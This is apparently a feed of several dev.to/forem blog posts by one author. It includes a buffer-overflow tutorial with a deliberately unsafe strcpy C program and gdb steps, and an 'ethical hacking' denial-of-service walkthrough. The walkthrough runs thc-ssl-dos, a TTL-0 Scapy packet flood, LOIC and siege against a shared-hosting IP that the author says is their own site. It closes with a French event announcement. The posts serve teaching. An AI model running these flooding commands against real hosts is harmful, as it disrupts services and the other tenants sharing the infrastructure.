src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwapn0llpubslvtkxgzt8.png" alt=" " width="771" height="547"></a></p> <h1> exploitation </h1> <ul> <li> </li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fywc9wgq8on3c16botw88.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fywc9wgq8on3c16botw88.png" alt=" " width="769" height="548"></a></p> <ul> <li> </li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1khn5hwfij6erj722es5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1khn5hwfij6erj722es5.png" alt=" " width="768" height="544"></a></p> <ul> <li> </li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl3dqnknik6y2hjsikxci.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl3dqnknik6y2hjsikxci.png" alt=" " width="800" height="327"></a></p> <h2> Use skipfish </h2> <p>Launch<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>skipfish <span class="nt">-o</span> /home/samglish/Desktop/SamRapport <span class="nt">-S</span> /usr/share/skipfish/dictionaries/minimal.wl http://samglishinc.000webhostapp.com </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35yi5mad7unupxcetng2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F35yi5mad7unupxcetng2.png" alt=" " width="800" height="574"></a><br> Go to SamRapport</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fejet57pjhz43zx26r062.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fejet57pjhz43zx26r062.png" alt=" " width="800" height="403"></a><br> Open index.html in your browser<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbf13txbuopzrkyamujaq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbf13txbuopzrkyamujaq.png" alt=" " width="800" height="328"></a></p> server dirbuster vulnerability skipfish buffer Overflow (Application Vulnerability) BEIDI DINA SAMUEL Mon, 24 Jun 2024 23:28:31 +0000 https://forem.com/samglish/buffer-overflow-application-vulnerability-20ic https://forem.com/samglish/buffer-overflow-application-vulnerability-20ic <p><strong><a href="https://github.com/samglish/bufferOverflow/" rel="noopener noreferrer">https://github.com/samglish/bufferOverflow/</a></strong></p> <p>In french <code>dépassement de tampon ou débordement de tampon</code></p> <p>copy data without checking size.<br> A bug whereby a process, when writing to a buffer, writes outside the space allocated to the buffer, thus overwriting information necessary for the process.</p> <p><strong>Most common exploitation</strong></p> <ol> <li>stack overflow</li> <li>Injection of a shellcode on the stack and calculation of its address</li> <li>Overflow of a variable on the stack</li> <li>Overwriting SEIP with the shellcode address</li> </ol> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzj1gl7tx9zza0k5hy29.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzj1gl7tx9zza0k5hy29.png" alt=" " width="654" height="508"></a></p> <p><strong>A C program to demonstrate buffer overflow</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight c"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> #include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span> <span class="c1">// Reserve 5 byte of buffer plus the terminating NULL.</span> <span class="c1">// should allocate 8 bytes = 2 double words,</span> <span class="c1">// To overflow, need more than 8 bytes...</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">5</span><span class="p">];</span> <span class="c1">// If more than 8 characters input</span> <span class="c1">// by user, there will be access </span> <span class="c1">// violation, segmentation fault</span> <span class="c1">// a prompt how to execute the program...</span> <span class="k">if</span> <span class="p">(</span><span class="n">argc</span> <span class="o">&lt;</span> <span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"strcpy() NOT executed....</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Syntax: %s &lt;characters&gt;</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// copy the user input to mybuffer, without any</span> <span class="c1">// bound checking a secure version is strcpy_s()</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"buffer content= %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span> <span class="c1">// you may want to try strcpy_s()</span> <span class="n">printf</span><span class="p">(</span><span class="s">"strcpy() executed...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h2> Test </h2> <p>Open terminal</p> <ol> <li>compile the program </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">gcc -g -o BOF testoverflow.c </span></code></pre> </div> <ol> <li>execute </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">./BOF sam </span></code></pre> </div> <ol> <li>output </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>buffer content= sam strcpy() executed... </code></pre> </div> <h3> now enter more than 8 characters. </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>./BOF beididinasamuel </code></pre> </div> <p>output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>buffer content= beididinasamuel strcpy() executed... Erreur de segmentation </code></pre> </div> <h3> exploit, use GDB in terminal </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>$gdb -q ./BOF </code></pre> </div> <p>output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Reading symbols from ./BOF... (gdb) </code></pre> </div> <ol> <li>list the program </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>(gdb) list 1 </code></pre> </div> <p>output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>1 // A C program to demonstrate buffer overflow 2 #include &lt;stdio.h&gt; 3 #include &lt;string.h&gt; 4 #include &lt;stdlib.h&gt; 5 6 int main(int argc, char *argv[]) 7 { 8 9 // Reserve 5 byte of buffer plus the terminating NULL. 10 // should allocate 8 bytes = 2 double words, (gdb) 11 // To overflow, need more than 8 bytes... 12 char buffer[5]; // If more than 8 characters input 13 // by user, there will be access 14 // violation, segmentation fault 15 16 // a prompt how to execute the program... 17 if (argc &lt; 2) 18 { 19 printf("strcpy() NOT executed....\n"); 20 printf("Syntax: %s &lt;characters&gt;\n", argv[0]); (gdb) 21 exit(0); 22 } 23 24 // copy the user input to mybuffer, without any 25 // bound checking a secure version is strcpy_s() 26 strcpy(buffer, argv[1]); 27 printf("buffer content= %s\n", buffer); 28 29 // you may want to try strcpy_s() 30 printf("strcpy() executed...\n"); </code></pre> </div> <ol> <li>breakpoint ( gdb will stop your program just before that function is called) </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>(gdb) break 26 </code></pre> </div> <p>output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>(gdb) break 26 Breakpoint 1 at 0x11ab: file overflow.c, line 26. </code></pre> </div> <ol> <li>run the program </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>(gdb) run AAAAAAAAAAAAAAAA </code></pre> </div> <p>output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Starting program: Directory/BOF AAAAAAAAAAAAAAAA Breakpoint 1, main (argc=2, argv=0x7fffffffe038) at overflow.c:26 26 strcpy(buffer, argv[1]); (gdb) </code></pre> </div> <p>the program stopped at line 26</p> <h3> let's analyze the data of the variable </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>(gdb) x/s buffer </code></pre> </div> <p>output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>0x7fffffffdf3b:"001" (gdb) </code></pre> </div> <p>for more information on the exploit of content visit click here<br> <a href="https://bufferoverflows.net/getting-started-with-linux-buffer-overflow/" rel="noopener noreferrer"></a><a href="https://bufferoverflows.net/getting-started-with-linux-buffer-overflow/" rel="noopener noreferrer">https://bufferoverflows.net/getting-started-with-linux-buffer-overflow/</a></p> bufferoverflo vulnerabilities vulnerability Technical Dos attacks BEIDI DINA SAMUEL Mon, 24 Jun 2024 01:07:56 +0000 https://forem.com/samglish/technical-dos-attacks-2982 https://forem.com/samglish/technical-dos-attacks-2982 <p>Ethical Hacking - Dos attacks on different services.<br> <a href="https://github.com/samglish/technicalDos" rel="noopener noreferrer">https://github.com/samglish/technicalDos</a><br> <strong>The different tools</strong></p> <ol> <li>Metasploit</li> <li>Nmap NSE</li> <li>Exploit database</li> <li>Scapy</li> </ol> <p><strong>DOS/DDOS categories</strong></p> <ul> <li>Session abuse.</li> <li>Attacks based on packet volume.</li> <li>Protocol-based attacks.</li> <li>Attacks based on the application layer.</li> </ul> <p><strong>The tools we are going to use</strong></p> <ul> <li>Low Orbit Ion Cannon</li> <li>THC SSL DOS</li> <li>Scapy</li> <li>Slowloris</li> <li> <a href="https://upordown.ultrawebhosting.com/" rel="noopener noreferrer">https://upordown.ultrawebhosting.com/</a> <strong>let's try it</strong> <em>1st tool is a website : <a href="https://upordown.ultrawebhosting.com/" rel="noopener noreferrer">https://upordown.ultrawebhosting.com/</a></em> </li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fekye04c7t7buqznbfg0i.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fekye04c7t7buqznbfg0i.png" alt=" " width="800" height="334"></a></p> <p>I will check if my site is available or not following service denial attacks. <a href="https://samglishinc.000webhostapp.com" rel="noopener noreferrer">https://samglishinc.000webhostapp.com</a><br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag9fyfvaaf69wo0eefy.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag9fyfvaaf69wo0eefy.png" alt=" " width="800" height="328"></a></p> <p>we see that the website is available.<br> <strong>THC SSL DOS</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>thc-ssl-dos </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code> ______________ ___ _________ \__ ___/ | \ \_ ___ \ | | / ~ \/ \ \/ | | \ Y /\ \____ |____| \___|_ / \______ / \/ \/ http://www.thc.org Twitter @hackerschoice Greetingz: the french underground ./thc-ssl-dos [options] &lt;ip&gt; &lt;port&gt; -h help -l &lt;n&gt; Limit parallel connections [default: 400] </code></pre> </div> <p>how to use : thc-ssl-dos ip_target --accept</p> <p>i want to test my website: let's see ip adress</p> <p>run this command<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>dmitry samglishinc.000webhostapp.com </code></pre> </div> <p>Output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Deepmagic Information Gathering Tool "There be some deep magic going on" HostIP:145.14.145.210 HostName:samglishinc.000webhostapp.com Gathered Inet-whois information for 145.14.145.210 --------------------------------- </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>thc-ssl-dos 145.14.145.210 <span class="nt">--accept</span> </code></pre> </div> <p>Output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Waiting <span class="k">for </span>script kiddies to piss off................ The force is with those <span class="nb">who read </span>the source... Handshakes 0 <span class="o">[</span>0.00 h/s], 1 Conn, 0 Err Handshakes 4[4.310 h/s], 2 Conn, 0 Err </code></pre> </div> <h1> Scapy </h1> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>scapy </code></pre> </div> <p>Output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>INFO: Can<span class="s1">'t import PyX. Won'</span>t be able to use psdump<span class="o">()</span> or pdfdump<span class="o">()</span><span class="nb">.</span> aSPY//YASa apyyyyCY//////////YCa | sY//////YSpcs scpCY//Pp | Welcome to Scapy ayp ayyyyyyySCP//Pp syY//C | Version 2.4.4 AYAsAYYYYYYYY///Ps cY//S | pCCCCY//p cSSps y//Y | https://github.com/secdev/scapy SPPPP///a pP///AC//Y | A//A cyP////C | Have fun! p///Ac sC///a | P////YCpc A//A | Craft packets like I craft my beer. scccccp///pSP///p p//Y | <span class="nt">--</span> Jean De Clerck sY/////////y caa S//P | cayCyayP//Ya pY/Ya sY/PsY////YCc aC//Yp sc sccaCY//PCypaapyCP//YSs spCPY//////YPSps ccaacs using IPython 8.18.1 <span class="o">&gt;&gt;&gt;</span> </code></pre> </div> <p>We will send a packet with a TTL 0, it is a malformed packet which will create confusion for the target server then a service denial we will send millions of requests.</p> <p>Format <code>end(dst="ip", ttl=0)/TCP(),iface="",count=2000)</code> </p> <p>see your ip_adress and nerwork interface<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>ifconfig </code></pre> </div> <p><code>adresse cible</code> : <br> <code>malformed packet</code> : use TTL 0<br> <code>packet volume</code>: 2000<br> <code>interface</code> : wlo1<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>INFO: Can<span class="s1">'t import PyX. Won'</span>t be able to use psdump<span class="o">()</span> or pdfdump<span class="o">()</span><span class="nb">.</span> aSPY//YASa apyyyyCY//////////YCa | sY//////YSpcs scpCY//Pp | Welcome to Scapy ayp ayyyyyyySCP//Pp syY//C | Version 2.4.4 AYAsAYYYYYYYY///Ps cY//S | pCCCCY//p cSSps y//Y | https://github.com/secdev/scapy SPPPP///a pP///AC//Y | A//A cyP////C | Have fun! p///Ac sC///a | P////YCpc A//A | Craft packets like I craft my beer. scccccp///pSP///p p//Y | <span class="nt">--</span> Jean De Clerck sY/////////y caa S//P | cayCyayP//Ya pY/Ya sY/PsY////YCc aC//Yp sc sccaCY//PCypaapyCP//YSs spCPY//////YPSps ccaacs using IPython 8.18.1 <span class="o">&gt;&gt;&gt;</span>send<span class="o">(</span>IP<span class="o">(</span><span class="nv">dst</span><span class="o">=</span><span class="s2">"145.14.145.210"</span>, <span class="nv">ttl</span><span class="o">=</span>0<span class="o">)</span>/TCP<span class="o">()</span>,iface<span class="o">=</span><span class="s2">"wlo1"</span>,count<span class="o">=</span>2000<span class="o">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ Sent 2000 packets. </code></pre> </div> <p>for more information visit: <a href="http://sdz.tdct.org/sdz/manipulez-les-paquets-reseau-avec-scapy.html" rel="noopener noreferrer">http://sdz.tdct.org/sdz/manipulez-les-paquets-reseau-avec-scapy.html</a></p> <h1> Low Orbit Ion Cannon (LOIC) </h1> <p>Install LOIC</p> <p>create folder <code>Loic</code><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>mkdir Loic </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>cd Loic/ </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>git clone https://github.com/nicolargo/loicinstaller.git </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>cd loicinstaller/ </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>./loic.sh </code></pre> </div> <p>Usage: ./loic.sh <br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>./loic.sh install </code></pre> </div> <p>run<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>./loic.sh run </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdlm6lya33gasm4yro9bt.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdlm6lya33gasm4yro9bt.png" alt=" " width="800" height="367"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft4mudoxvui2kkdql7zbs.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft4mudoxvui2kkdql7zbs.png" alt=" " width="800" height="366"></a><br> Output<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>New configuration template added to /home/samglish/.siege Run siege -C to view the current settings in that file SIEGE 4.0.7 Usage: siege [options] siege [options] URL siege -g URL Options: -V, --version VERSION, prints the version number. -h, --help HELP, prints this section. -C, --config CONFIGURATION, show the current config. -v, --verbose VERBOSE, prints notification to screen. -q, --quiet QUIET turns verbose off and suppresses output. -g, --get GET, pull down HTTP headers and display the transaction. Great for application debugging. -p, --print PRINT, like GET only it prints the entire page. -c, --concurrent=NUM CONCURRENT users, default is 10 -r, --reps=NUM REPS, number of times to run the test. -t, --time=NUMm TIMED testing where "m" is modifier S, M, or H ex: --time=1H, one hour test. -d, --delay=NUM Time DELAY, random delay before each request -b, --benchmark BENCHMARK: no delays between requests. -i, --internet INTERNET user simulation, hits URLs randomly. -f, --file=FILE FILE, select a specific URLS FILE. -R, --rc=FILE RC, specify an siegerc file -l, --log[=FILE] LOG to FILE. If FILE is not specified, the default is used: /var/log/siege.log -m, --mark="text" MARK, mark the log file with a string. between .001 and NUM. (NOT COUNTED IN STATS) -H, --header="text" Add a header to request (can be many) -A, --user-agent="text" Sets User-Agent in request -T, --content-type="text" Sets Content-Type in request -j, --json-output JSON OUTPUT, print final stats to stdout as JSON --no-parser NO PARSER, turn off the HTML page parser --no-follow NO FOLLOW, do not follow HTTP redirects Copyright (C) 2018 by Jeffrey Fulmer, et al. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>siege samglishinc.000webhostapp.com </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>{ "transactions": 9842, "availability": 99.93, "elapsed_time": 442.90, "data_transferred": 9.92, "response_time": 1.06, "transaction_rate": 22.22, "throughput": 0.02, "concurrency": 23.49, "successful_transactions": 7646, "failed_transactions": 7, "longest_transaction": 38.89, "shortest_transaction": 0.35 } </code></pre> </div> cybersecurity ddos GNDC (Grand Nord Developers Community) BEIDI DINA SAMUEL Thu, 20 Jun 2024 10:30:11 +0000 https://forem.com/samglish/gndc-grand-nord-developers-community-4fn3 https://forem.com/samglish/gndc-grand-nord-developers-community-4fn3 <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4t7lqeb61sxxcs8gl2k8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4t7lqeb61sxxcs8gl2k8.png" alt=" " width="800" height="875"></a></p> <p>Nous sommes heureux de vous annoncer Djabbama Code, un événement exceptionnel organisé par la Grand Nord Developers Community (GNDC) ! Rejoignez-nous le 23 juin de 14h à 17h pour une après-midi dédiée aux technologies de développement d'applications.</p> <p>📅 Date : 23 juin 2024<br> 🕒 Heure : 14h - 17h<br> 📍 Lieu : En ligne </p> <p>Qu'est-ce que Djabbama Code ?<br> Djabama Code est une plateforme unique où des experts partageront leurs connaissances sur le développement d'applications mobiles, web et desktop, le design graphique, l'infographie, le multimédia et bien plus encore. Chaque domaine sera couvert par deux speakers qui présenteront des technologies spécifiques avec des démonstrations pratiques et des défis interactifs.</p> <p>Pourquoi participer ?</p> <ul> <li>Découvrez les dernières technologies de développement</li> <li>Apprenez des expériences de professionnels expérimentés</li> <li>Participez à des démonstrations et des défis passionnants</li> <li>Réseautez avec d'autres développeurs et passionnés de technologie</li> </ul> grandnorddeveloperscommunity developers beididinasamuel